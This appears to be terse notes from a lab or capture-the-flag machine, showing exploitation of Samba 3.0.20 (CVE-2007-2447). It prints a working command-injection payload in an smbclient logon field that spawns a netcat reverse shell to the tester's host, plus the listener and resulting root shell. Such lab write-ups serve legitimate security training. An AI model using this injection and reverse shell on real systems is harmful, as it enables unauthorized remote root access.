4 :139 :445 smb exploit
We know
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
https://www.exploit-db.com/exploits/16320
https://github.com/amriunix/CVE-2007-2447
https://gist.github.com/joenorton8014/19aaa00e0088738fc429cff2669b9851
$ smbclient //10.10.10.3/tmp
Enter WORKGROUP\kashz's password:
Anonymous login successful
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.14.2 7070`"
Password:
$ rlwrap nc -lvnp 7070
listening on [any] 7070 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.3] 50322
whoami
root
id
uid=0(root) gid=0(root)
Last updated